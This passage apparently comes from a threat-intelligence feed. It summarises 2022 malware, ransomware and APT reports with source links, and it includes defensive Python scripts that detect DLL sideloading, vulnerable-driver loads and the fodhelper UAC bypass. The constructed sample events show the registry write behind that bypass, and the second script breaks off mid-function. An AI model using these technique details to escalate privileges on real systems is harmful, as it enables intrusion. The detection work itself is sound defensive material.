Researchers from Checkpoint have observed the changes in the behavior of Bumblebee’s servers that occurred around June 2022 indicating that the attackers may have shifted their focus from extensive testing of their malware to reaching as many victims as possible.
Source: https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/
2022-10-04
New_Pegasus_Spyware_Abuses
LOW
+
Intel Source:
Citizenlab
Intel Name:
New_Pegasus_Spyware_Abuses
Date of Scan:
2022-10-04
Impact:
LOW
Summary:
Researchers from Mexican digital rights organization R3D have identified Pegasus infections against journalists and a human rights defender and Citizen Lab provided technical support for R3D’s analysis and validated the infections.
Source: https://citizenlab.ca/2022/10/new-pegasus-spyware-abuses-identified-in-mexico/
2022-10-03
The_malicious_decentralized_application_websites_abused_by_Water_Labbu
LOW
+
Intel Source:
TrendMicro
Intel Name:
The_malicious_decentralized_application_websites_abused_by_Water_Labbu
Date of Scan:
2022-10-03
Impact:
LOW
Summary:
Trend Micro discovered a threat actor it named Water Labbu that targets cryptocurrency scam websites: rather than running its own scams, it compromises other scammers' malicious decentralized application (DApp) sites and steals the cryptocurrency of their victims.
Source: https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html
2022-10-03
Media_clones_serving_Russian_propaganda_in_Europe
LOW
+
Intel Source:
Disinfo Lab
Intel Name:
Media_clones_serving_Russian_propaganda_in_Europe
Date of Scan:
2022-10-03
Impact:
LOW
Summary:
EU DisinfoLab researchers have investigated a large disinformation campaign targeting western audiences with pro-Russian propaganda.
Source: https://www.disinfo.eu/wp-content/uploads/2022/09/Doppelganger-1.pdf
2022-10-03
A_deploying_malware_on_the_ESXi_Hypervisors
LOW
+
Intel Source:
Mandiant
Intel Name:
A_deploying_malware_on_the_ESXi_Hypervisors
Date of Scan:
2022-10-03
Impact:
LOW
Summary:
Mandiant is investigating novel malware that persists within VMware ESXi hypervisors. Mandiant tracks this activity as the threat actor group UNC3886. Given the highly targeted and evasive nature of this intrusion, Mandiant suspects UNC3886's motivation to be cyber espionage.
Source: https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
2022-10-03
Hackers_Targeting_Military_and_Weapons_Contractors
MEDIUM
+
Intel Source:
Securonix
Intel Name:
Hackers_Targeting_Military_and_Weapons_Contractors
Date of Scan:
2022-10-03
Impact:
MEDIUM
Summary:
Researchers from Securonix have identified a new phishing campaign targeting multiple military contractors involved in weapon manufacturing, including an F-35 Lightning II fighter aircraft components supplier.
Source: https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/
2022-10-03
Malware_hidden_in_Windows_logo_in_cyber_attacks_against_Middle_Eastern_governments
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Malware_hidden_in_Windows_logo_in_cyber_attacks_against_Middle_Eastern_governments
Date of Scan:
2022-10-03
Impact:
MEDIUM
Summary:
Symantec researchers have observed threat actors using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage
2022-10-03
Mozilla_Thunderbird_distributing_Redline_Stealer
LOW
+
Intel Source:
Esentire
Intel Name:
Mozilla_Thunderbird_distributing_Redline_Stealer
Date of Scan:
2022-10-03
Impact:
LOW
Summary:
Researchers from eSentire have analyzed a RedLine Stealer infection in which the stealer was distributed under the guise of the Mozilla Thunderbird email client.
Source: https://www.esentire.com/blog/redline-stealer-and-mozilla-thunderbird
2022-10-03
North_Korea_Lazarus_Hackers_Targeting_macOS_Users
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
North_Korea_Lazarus_Hackers_Targeting_macOS_Users
Date of Scan:
2022-10-03
Impact:
MEDIUM
Summary:
SentinelOne researchers have reviewed the details of Operation In(ter)ception campaign and observed a further variant in the same campaign using lures for open positions at rival exchange Crypto.com
Source: https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/
2022-10-03
A_new_ransomware_Bl00dy
LOW
+
Intel Source:
Cyble
Intel Name:
A_new_ransomware_Bl00dy
Date of Scan:
2022-10-03
Impact:
LOW
Summary:
Researchers from Cyble have identified a new ransomware named “Bl00dy” that is targeting organizations using double extortion techniques. A ransom note is created on the system to demand payment for the encrypted files. After the ransomware encrypts the files, it appends their extension with ".bl00dy."
Source: https://blog.cyble.com/2022/09/28/bl00dy-new-ransomware-strain-active-in-the-wild/
2022-10-03
New_Go_Based_Malware_Targeting_Windows_and_Linux_Systems
MEDIUM
+
Intel Source:
Lumen
Intel Name:
New_Go_Based_Malware_Targeting_Windows_and_Linux_Systems
Date of Scan:
2022-10-03
Impact:
MEDIUM
Summary:
Researchers from Lumen have identified a new multi-functional Go-based malware named Chaos. The malware is rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.
Source: https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/?utm_source=press+release&utm_medium=referral
2022-10-03
Unpatched_Microsoft_Exchange_Zero-Day_Under_Active_Exploitation
MEDIUM
+
Intel Source:
GTSC
Intel Name:
Unpatched_Microsoft_Exchange_Zero-Day_Under_Active_Exploitation
Date of Scan:
2022-10-03
Impact:
MEDIUM
Summary:
Researchers from GTSC have identified flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems.
Source: https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
2022-09-30
New_Malware_Variants_Deliver_Fake_Cloudflare_DDoS_Captcha
LOW
+
Intel Source:
Sucuri
Intel Name:
New_Malware_Variants_Deliver_Fake_Cloudflare_DDoS_Captcha
Date of Scan:
2022-09-30
Impact:
LOW
Summary:
Researchers from Sucuri have identified new variants of a website malware campaign. Earlier waves prompted the visitor with a bogus Cloudflare DDoS protection screen; in this new wave they observed a fake CAPTCHA dialog masquerading as the popular Cloudflare service.
Source: https://blog.sucuri.net/2022/09/new-malware-variants-serve-bogus-cloudflare-ddos-captcha.html
2022-09-30
Hackers_using_Quantum_Builder_to_deliver_Agent_Tesla_RAT
LOW
+
Intel Source:
Zscaler
Intel Name:
Hackers_using_Quantum_Builder_to_deliver_Agent_Tesla_RAT
Date of Scan:
2022-09-30
Impact:
LOW
Summary:
Zscaler ThreatLabz researchers have observed a campaign that delivers Agent Tesla, a .NET-based keylogger and remote access trojan (RAT), using a builder named “Quantum Builder” sold on the dark web.
Source: https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps
2022-09-30
Polyglot_File_Delivering_IcedID
LOW
+
Intel Source:
Palo Alto
Intel Name:
Polyglot_File_Delivering_IcedID
Date of Scan:
2022-09-30
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 researchers have observed a polyglot Microsoft Compiled HTML Help file being employed in the infection process used by the information stealer IcedID.
Source: https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/
2022-09-30
The_examination_of_Wiper_Malware_Part_3
LOW
+
Intel Source:
Crowdstrike
Intel Name:
The_examination_of_Wiper_Malware_Part_3
Date of Scan:
2022-09-30
Impact:
LOW
Summary:
Researchers from CrowdStrike have covered various I/O control codes (IOCTLs) in more detail and how wiper malware uses them to achieve different goals, including acquiring information about infected machines and locking or unlocking disk volumes.
Source: https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/
2022-09-30
Finding_APTs_using_Unsigned_DLLs_Loader
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Finding_APTs_using_Unsigned_DLLs_Loader
Date of Scan:
2022-09-30
Impact:
MEDIUM
Summary:
Palo Alto Networks Unit 42 researchers have described how APT actors load unsigned DLLs into legitimate signed processes to evade detection, and how hunting for unsigned DLL loads can surface these more sophisticated attacks.
Source: https://unit42.paloaltonetworks.com/unsigned-dlls/
2022-09-30
LockBit_3_0_aka_LockBit_Black
MEDIUM
+
Intel Source:
Multiple
Intel Name:
LockBit_3_0_aka_LockBit_Black
Date of Scan:
2022-09-30
Impact:
MEDIUM
Summary:
Researchers have analyzed LockBit and identified that it is back as LockBit 3.0 (aka LockBit Black).
Source: https://docs.google.com/spreadsheets/d/1Now95XPSkvEiCJy5H5iqgTDKi_ATZeBY_PhnxSUhWl8/edit#gid=0
2022-09-30
Detecting_and_Removing_Malicious_Software_Masquerading_as_Doenerium_Stealer
LOW
+
Intel Source:
Cyble
Intel Name:
Detecting_and_Removing_Malicious_Software_Masquerading_as_Doenerium_Stealer
Date of Scan:
2022-09-30
Impact:
LOW
Summary:
A spear-phishing email campaign targeting Office 365 users has been observed by Cyble researchers. The same domain has also been observed hosting several other malware variants, such as the Doenerium stealer.
Source: https://blog.cyble.com/2022/09/28/new-information-stealer-targeting-crypto-wallets/
2022-09-30
A_new_Cobalt_Strike_payload_campaign
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
A_new_Cobalt_Strike_payload_campaign
Date of Scan:
2022-09-30
Impact:
MEDIUM
Summary:
Researchers from Cisco have discovered a campaign that is delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
Source: https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html
2022-09-29
Void_Balaur_hack_for_hire_campaigns
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Void_Balaur_hack_for_hire_campaigns
Date of Scan:
2022-09-29
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed that the cyber mercenary group known as Void Balaur continues to expand its hack-for-hire campaigns and its targeting of a wide variety of individuals and organizations across the globe.
Source: https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/
2022-09-29
LockBit_3_0_Ransomware_Spreading_via_Word_Documents
LOW
+
Intel Source:
ASEC
Intel Name:
LockBit_3_0_Ransomware_Spreading_via_Word_Documents
Date of Scan:
2022-09-29
Impact:
LOW
Summary:
ASEC researchers have identified that LockBit 3.0 ransomware, previously distributed as an NSIS installer disguised as a job application email attachment, is now also being distributed in Word document format.
Source: https://asec.ahnlab.com/en/39242/ https://asec.ahnlab.com/en/39259/
2022-09-28
Mass_Emailing_campaign_delivering_Agent_Tesla_malware
LOW
+
Intel Source:
Securelist
Intel Name:
Mass_Emailing_campaign_delivering_Agent_Tesla_malware
Date of Scan:
2022-09-28
Impact:
LOW
Summary:
Researchers from Securelist have discovered a spam campaign that delivers the Agent Tesla malware. On analysis, the email messages turned out to be high-quality imitations of business inquiries from real companies.
Source: https://securelist.com/agent-tesla-malicious-spam-campaign/107478/
2022-09-28
A_new_variant_of_Graphite_Malware
MEDIUM
+
Intel Source:
Cluster25
Intel Name:
A_new_variant_of_Graphite_Malware
Date of Scan:
2022-09-28
Impact:
MEDIUM
Summary:
Cluster25 researchers have analyzed a lure document used to implant a variant of Graphite malware, which is linked to the threat actor known as APT28.
Source: https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/
2022-09-28
Malicious_NPM_package_discovered_in_supply_chain_attack
MEDIUM
+
Intel Source:
ReversingLab
Intel Name:
Malicious_NPM_package_discovered_in_supply_chain_attack
Date of Scan:
2022-09-28
Impact:
MEDIUM
Summary:
Researchers from ReversingLabs have identified the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories, intended to trick unwitting developers into using the package in place of the real library.
Source: https://blog.reversinglabs.com/blog/threat-analysis-malicious-npm-package-mimicks-material-tailwind-css-tool
2022-09-28
A_Trojan_Downloader_Named_NullMixer
LOW
+
Intel Source:
Securelist
Intel Name:
A_Trojan_Downloader_Named_NullMixer
Date of Scan:
2022-09-28
Impact:
LOW
Summary:
Researchers from Securelist have identified a large proportion of the malware families dropped by NullMixer are classified as Trojan-Downloaders.
Source: https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/
2022-09-27
BumbleBee_Malware_Deploying_Cobalt_Strike_and_Meterpreter
LOW
+
Intel Source:
DFIR Report
Intel Name:
BumbleBee_Malware_Deploying_Cobalt_Strike_and_Meterpreter
Date of Scan:
2022-09-27
Impact:
LOW
Summary:
The DFIR Report has documented threat actors using BumbleBee malware to deploy Cobalt Strike and Meterpreter. They used RDP and SMB to move around the network, looking at backup systems and file shares, before being evicted from the network.
Source: https://thedfirreport.com/2022/09/26/bumblebee-round-two/
2022-09-27
FARGO_Ransomware_Targeting_Vulnerable_Microsoft_SQL_Servers
LOW
+
Intel Source:
ASEC
Intel Name:
FARGO_Ransomware_Targeting_Vulnerable_Microsoft_SQL_Servers
Date of Scan:
2022-09-27
Impact:
LOW
Summary:
Researchers from ASEC have discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets vulnerable MS-SQL servers.
Source: https://asec.ahnlab.com/en/39152/
2022-09-27
Phishing_Campaign_Targeting_GitHub_Accounts
LOW
+
Intel Source:
GitHub Blog
Intel Name:
Phishing_Campaign_Targeting_GitHub_Accounts
Date of Scan:
2022-09-27
Impact:
LOW
Summary:
Researchers from the GitHub security team have identified that attackers are targeting GitHub users to steal credentials and two-factor authentication (2FA) codes by impersonating the CircleCI DevOps platform.
Source: https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/
2022-09-27
Floxif_Malware_Family_Leveraging_Cookies
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Floxif_Malware_Family_Leveraging_Cookies
Date of Scan:
2022-09-27
Impact:
LOW
Summary:
Researchers from SANS ISC have analyzed a malware sample from the Floxif family that steals browser cookies, in the light of the recent Vectra disclosure that Microsoft Teams stores authentication tokens in cleartext on disk.
Source: https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082/
2022-09-26
NFT_Malware_Gets_New_Evasion_Abilities
LOW
+
Intel Source:
Morphisec
Intel Name:
NFT_Malware_Gets_New_Evasion_Abilities
Date of Scan:
2022-09-26
Impact:
LOW
Summary:
Researchers from Morphisec have tracked several waves of the NFT malware delivering the Remcos RAT. In June 2022 they found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been discarded for a newly staged downloader.
Source: https://blog.morphisec.com/nft-malware-new-evasion-abilities
2022-09-26
New_Hacking_Group_Metador_Targeting_Telecommunications_ISPs_and_Universities
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
New_Hacking_Group_Metador_Targeting_Telecommunications_ISPs_and_Universities
Date of Scan:
2022-09-26
Impact:
MEDIUM
Summary:
Researchers from SentinelOne have discovered a new threat actor named Metador that targets telecommunications providers, internet service providers, and universities in several countries in the Middle East and Africa.
Source: https://assets.sentinelone.com/sentinellabs22/metador
2022-09-26
Noberus_Ransomware_Continues_to_Develop_its_TTPs
LOW
+
Intel Source:
Symantec
Intel Name:
Noberus_Ransomware_Continues_to_Develop_its_TTPs
Date of Scan:
2022-09-26
Impact:
LOW
Summary:
Symantec researchers have identified that the Noberus (aka BlackCat, ALPHV) ransomware has been using new tactics, tools, and procedures in recent months, making the threat more dangerous than ever.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps
2022-09-26
Cybercriminals_target_Magento_vulnerability_in_new_wave_of_attacks
LOW
+
Intel Source:
Sansec
Intel Name:
Cybercriminals_target_Magento_vulnerability_in_new_wave_of_attacks
Date of Scan:
2022-09-26
Impact:
LOW
Summary:
Researchers from Sansec have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites.
Source: https://sansec.io/research/magento-2-template-attacks
2022-09-26
A_Technical_Analysis_of_Lockbit_3_0_Builder
LOW
+
Intel Source:
Cybergeeks
Intel Name:
A_Technical_Analysis_of_Lockbit_3_0_Builder
Date of Scan:
2022-09-26
Impact:
LOW
Summary:
Researchers from Cybergeeks have analyzed LockBit 3.0 builder that was leaked online on 21st September 2022.
Source: https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/
2022-09-26
Chinese_Hacker_Group_TA413_Evolves_Capabilities_to_Targeting_Tibetan
LOW
+
Intel Source:
Recorded Future
Intel Name:
Chinese_Hacker_Group_TA413_Evolves_Capabilities_to_Targeting_Tibetan
Date of Scan:
2022-09-26
Impact:
LOW
Summary:
RecordedFuture researchers have observed the targeting of ethnic and religious minority communities by Chinese state-sponsored groups for surveillance and intelligence-gathering purposes.
Source: https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets
2022-09-23
SystemBC_Malware_Turns_Infected_Computers_into_SOCKS5_Proxies
LOW
+
Intel Source:
BitSight
Intel Name:
SystemBC_Malware_Turns_Infected_Computers_into_SOCKS5_Proxies
Date of Scan:
2022-09-23
Impact:
LOW
Summary:
BitSight researchers have observed that SystemBC malware still turns infected computers into SOCKS5 proxy servers. Most bots cannot be reached from the internet, so this malware uses a backconnect architecture that allows clients to access proxy servers without having to interact directly with them.
Source: https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes
2022-09-23
A_Deep_Analysis_of_Lazarus_Group_Rootkit_Attack_Using_BYOVD
LOW
+
Intel Source:
ASEC
Intel Name:
A_Deep_Analysis_of_Lazarus_Group_Rootkit_Attack_Using_BYOVD
Date of Scan:
2022-09-23
Impact:
LOW
Summary:
Researchers from ASEC have done a deep analysis of a Lazarus Group rootkit attack using BYOVD (Bring Your Own Vulnerable Driver). Lazarus is known to be a North Korean group that has attacked various countries in America, Asia, and Europe.
Source: https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf
2022-09-23
FODHelper_Delivering_Remcos_RAT
LOW
+
Intel Source:
ISC.SANS
Intel Name:
FODHelper_Delivering_Remcos_RAT
Date of Scan:
2022-09-23
Impact:
LOW
Summary:
Researchers from SANS ISC have identified a simple batch file that drops a Remcos RAT through an old UAC bypass technique based on the auto-elevating fodhelper.exe binary.
Source: https://isc.sans.edu/diary/rss/29078
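Three techniques recur in this feed and all leave a footprint in Sysmon telemetry: DLL sideloading (the OneDrive cryptojacking and the Unit 42 unsigned-DLL entries), vulnerable signed drivers (BlackByte's RTCore64.sys, Lazarus's Dell DBUtil and BYOVD rootkit entries), and the fodhelper UAC bypass above. The script below is an added example written for this page, not code from any of the vendors cited; it assumes Sysmon Event ID 7, 6 and 13 fields exported as pipe-delimited key=value lines (the sample lines are constructed, not incident data), a default list of user-writable directories and a short list of commonly hijacked DLL names, all of which are assumptions to adapt to your estate.

```python
"""Sysmon triage for three techniques in this feed: DLL sideloading
(Event ID 7), bring-your-own-vulnerable-driver loads (Event ID 6) and the
fodhelper.exe UAC bypass (Event ID 13).

Added example, not code from any vendor cited in the feed. Input is
constructed pipe-delimited key=value telemetry; swap parse_event() for
your SIEM export format.
"""
import re

# Assumption: default user-writable locations; extend for your estate.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)"
    r"|programdata|windows\\temp|temp)\\",
    re.IGNORECASE,
)
# Assumption: DLL names commonly hijacked by name collision.
SIDELOAD_NAMES = {"version.dll", "secur32.dll", "cryptbase.dll", "dbghelp.dll",
                  "wtsapi32.dll", "userenv.dll", "uxtheme.dll", "profapi.dll"}
# Vulnerable but validly signed drivers named in this feed:
# MSI RTCore64.sys (CVE-2019-16098) and Dell DBUtil_2_3.sys (CVE-2021-21551).
VULN_DRIVERS = {"rtcore64.sys", "dbutil_2_3.sys"}
# Per-user key that the auto-elevating fodhelper.exe consults; an attacker
# sets (Default) to a command and DelegateExecute to an empty string.
FODHELPER_KEY = re.compile(
    r"\\software\\classes\\ms-settings\\shell\\open\\command\\"
    r"(\(default\)|delegateexecute)$",
    re.IGNORECASE,
)

SAMPLE_EVENTS = [  # constructed telemetry, not real incident data
    "EventID=7|Image=C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
    "|ImageLoaded=C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\secur32.dll"
    "|Signed=false|SignatureStatus=Unavailable",
    "EventID=7|Image=C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
    "|ImageLoaded=C:\\Windows\\System32\\secur32.dll|Signed=true|SignatureStatus=Valid",
    "EventID=6|ImageLoaded=C:\\Users\\Public\\RTCore64.sys"
    "|Signed=true|Signature=vendor-signed|SignatureStatus=Valid",
    "EventID=6|ImageLoaded=C:\\Windows\\System32\\drivers\\tcpip.sys"
    "|Signed=true|Signature=Microsoft Windows|SignatureStatus=Valid",
    "EventID=13|Image=C:\\Windows\\System32\\cmd.exe|EventType=SetValue"
    "|TargetObject=HKU\\S-1-5-21-1\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\DelegateExecute"
    "|Details=(Empty)",
    "EventID=13|Image=C:\\Windows\\System32\\cmd.exe|EventType=SetValue"
    "|TargetObject=HKU\\S-1-5-21-1\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\(Default)"
    "|Details=C:\\Users\\alice\\AppData\\Roaming\\install.bat",
]


def parse_event(line):
    return dict(field.split("=", 1) for field in line.split("|"))


def check_image_load(ev):
    """Event 7: unsigned DLL from a user-writable path, or a system DLL name
    resolved outside %SystemRoot% (the sideloading pattern)."""
    dll = ev["ImageLoaded"]
    if ev.get("Signed", "").lower() == "true":
        return []
    reasons = []
    if USER_WRITABLE.match(dll):
        reasons.append("unsigned DLL loaded from user-writable directory")
    name = dll.rsplit("\\", 1)[-1].lower()
    if name in SIDELOAD_NAMES and not dll.lower().startswith("c:\\windows\\"):
        reasons.append("system DLL name loaded outside %SystemRoot%")
    return reasons


def check_driver_load(ev):
    """Event 6: the signature check passes for BYOVD drivers, so match on the
    driver name and on a load path outside the Windows directory."""
    drv = ev["ImageLoaded"]
    reasons = []
    if drv.rsplit("\\", 1)[-1].lower() in VULN_DRIVERS:
        reasons.append("known vulnerable driver loaded (BYOVD)")
    if not drv.lower().startswith("c:\\windows\\"):
        reasons.append("driver loaded from non-standard path")
    return reasons


def check_registry_set(ev):
    """Event 13: any write to the ms-settings handler under a user hive."""
    if FODHELPER_KEY.search(ev.get("TargetObject", "")):
        return ["ms-settings shell handler written under HKCU (fodhelper UAC bypass)"]
    return []


RULES = {"7": check_image_load, "6": check_driver_load, "13": check_registry_set}


def triage(lines):
    """Return (event_id, subject, reasons) for every line that trips a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        rule = RULES.get(ev.get("EventID"))
        reasons = rule(ev) if rule else []
        if reasons:
            findings.append((ev["EventID"], ev.get("ImageLoaded") or ev.get("TargetObject"), reasons))
    return findings


if __name__ == "__main__":
    for event_id, subject, reasons in triage(SAMPLE_EVENTS):
        print(f"[Event {event_id}] {subject}: {'; '.join(reasons)}")
```

The driver rule deliberately ignores the signature fields: RTCore64.sys and DBUtil_2_3.sys carry valid vendor signatures, which is the whole point of BYOVD, so only the name (or, better, a hash blocklist) and an unusual load path identify them. The registry rule fires on any write to the ms-settings handler, including the empty DelegateExecute value, because the key has no legitimate reason to exist under a user hive.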
2022-09-23
Cybercriminals_are_Increasingly_Using_Domain_Shadowing
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Cybercriminals_are_Increasingly_Using_Domain_Shadowing
Date of Scan:
2022-09-23
Impact:
MEDIUM
Summary:
Palo Alto Networks Unit 42 researchers have discovered that domain shadowing is more widespread than previously thought, finding 12,197 cases between April and June 2022.
Source: https://unit42.paloaltonetworks.com/domain-shadowing/
2022-09-22
Hackers_Abusing_LinkedIn_Slink_to_Bypass_Secure_Email_Gateway
LOW
+
Intel Source:
Cofense
Intel Name:
Hackers_Abusing_LinkedIn_Slink_to_Bypass_Secure_Email_Gateway
Date of Scan:
2022-09-22
Impact:
LOW
Summary:
Cofense researchers have observed a phishing campaign that abuses LinkedIn Smart Links. While impersonating a well-known postal brand is nothing out of the ordinary, these phishing emails continue to pass undetected by popular email gateways.
Source: https://cofense.com/blog/threat-actors-abuse-linkedin-slink-to-bypass-secure-email-gateways
2022-09-22
Active_Exploitation_of_Atlassian_Confluence_Vulnerability
LOW
+
Intel Source:
TrendMicro
Intel Name:
Active_Exploitation_of_Atlassian_Confluence_Vulnerability
Date of Scan:
2022-09-22
Impact:
LOW
Summary:
Researchers from Trend Micro have observed samples actively exploiting the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.
Source: https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html
2022-09-22
Diving_Deep_into_Crytox_Ransomware
LOW
+
Intel Source:
Zscaler
Intel Name:
Diving_Deep_into_Crytox_Ransomware
Date of Scan:
2022-09-22
Impact:
LOW
Summary:
Researchers from Zscaler have done technical analysis of Crytox Ransomware which is multi-stage ransomware with a weak key generation algorithm.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware
2022-09-22
Iranian_hackers_Conduct_Cyber_Operations_Against_the_Government_of_Albania
MEDIUM
+
Intel Source:
CISA
Intel Name:
Iranian_hackers_Conduct_Cyber_Operations_Against_the_Government_of_Albania
Date of Scan:
2022-09-22
Impact:
MEDIUM
Summary:
A joint CISA and FBI advisory reports that the Iranian state cyber actors behind the destructive July attack on the Albanian government's network had been lurking inside its systems for roughly 14 months.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-264a
2022-09-22
Distribution_of_NetSupport_RAT_via_SocGholish
LOW
+
Intel Source:
Cyble
Intel Name:
Distribution_of_NetSupport_RAT_via_SocGholish
Date of Scan:
2022-09-22
Impact:
LOW
Summary:
Researchers from Cyble have observed that hackers are using fake browser update (SocGholish) to deliver the NetSupport RAT.
Source: https://blog.cyble.com/2022/09/21/netsupport-rat-distributed-via-socgholish/
2022-09-21
Zoom_Users_Targeted_by_Vidar_Stealer
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Zoom_Users_Targeted_by_Vidar_Stealer
Date of Scan:
2022-09-21
Impact:
MEDIUM
Summary:
The researchers from Cyble have observed numerous fake Zoom sites that look exactly like the real Zoom sites. The purpose of these sites is to distribute malware disguised as the legitimate Zoom application.
Source: https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/
2022-09-21
Hackers_Leveraging_Browser_Extensions
LOW
+
Intel Source:
MalwareBytes
Intel Name:
Hackers_Leveraging_Browser_Extensions
Date of Scan:
2022-09-21
Impact:
LOW
Summary:
Malwarebytes researchers have detected a family of browser extensions, PUP.Optional.AdMax, which claim to be ad blockers and do have some limited functionality.
Source: https://www.malwarebytes.com/blog/detections/pup-optional-admax
2022-09-21
Attackers_Abusing_Google_Tag_Manager_Payment_Card_E-Skimming
LOW
+
Intel Source:
Recorded Future
Intel Name:
Attackers_Abusing_Google_Tag_Manager_Payment_Card_E-Skimming
Date of Scan:
2022-09-21
Impact:
LOW
Summary:
According to Recorded Future researchers, 569 e-commerce domains have been infected by Magecart e-skimmers that exfiltrate stolen payment card information to GTM-based e-skimmer domains.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2022-0920.pdf
2022-09-21
Konni_(RAT)_phishing_activity
LOW
+
Intel Source:
Fortinet
Intel Name:
Konni_(RAT)_phishing_activity
Date of Scan:
2022-09-21
Impact:
LOW
Summary:
Researchers at Fortinet recently caught a sophisticated phishing attempt deploying malware which they tied to the arsenal of the APT37 group, related to the Konni RAT.
Source: https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware
2022-09-21
Attackers_Leveraging_Free_Online_Resources_for_Phishing_Campaigns
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Attackers_Leveraging_Free_Online_Resources_for_Phishing_Campaigns
Date of Scan:
2022-09-21
Impact:
LOW
Summary:
Researchers from SANS have analyzed phishing campaigns using free online resources.
Source: https://isc.sans.edu/forums/diary/Phishing+Campaigns+Use+Free+Online+Resources/29074/
2022-09-21
Magniber_Ransomware_file_extension_changed_from_jse_to_js
LOW
+
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_file_extension_changed_from_jse_to_js
Date of Scan:
2022-09-21
Impact:
LOW
Summary:
Researchers from ASEC have analyzed the Magniber ransomware script and found that is still a javascript but its file extension changed from *.jse to *.js.
Source: https://asec.ahnlab.com/en/39030/
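The two Magniber entries in this feed (the move from *.jse to *.js above, and from *.js to *.wsf on 2022-10-05) are the same lesson: Windows Script Host runs whatever the file contains, so gateway and sandbox rules keyed on the extension miss the next rotation. The classifier below is an added example written for this page, not ASEC's code; it labels a script attachment by its content (the Windows Script Encoder header, the WSF XML container, JScript or VBScript idioms) and pulls the script blocks out of a WSF so that an encoded block nested inside the XML is still surfaced. All samples are constructed; the encoded sample is only the `#@~^` header plus filler, not a real Magniber payload.

```python
"""Classify Windows Script Host payloads by content, not by extension.

Added example (not ASEC's code). Magniber's dropper moved from .jse to .js
to .wsf, but wscript.exe executes what the file contains, so gateway and
sandbox rules should label by structure. All samples below are constructed;
the encoded one is just the Script Encoder header plus filler.
"""
import re

ENCODED_MARKER = b"#@~^"   # header written by screnc.exe (JScript.Encode / VBScript.Encode)
WSF_TAG = re.compile(rb"<\s*job\b|<\s*script\s+language\s*=", re.IGNORECASE)
JS_HINT = re.compile(rb"\bvar\b|\bActiveXObject\b|\beval\s*\(")
VBS_HINT = re.compile(rb"\b(Dim\b|CreateObject\s*\(|On Error Resume Next|End Sub|End Function)",
                      re.IGNORECASE)
SCRIPT_BLOCK = re.compile(
    rb'<\s*script\s+language\s*=\s*["\']?([A-Za-z.]+)["\']?[^>]*>(.*?)<\s*/\s*script\s*>',
    re.IGNORECASE | re.DOTALL,
)


def classify_script(data: bytes) -> str:
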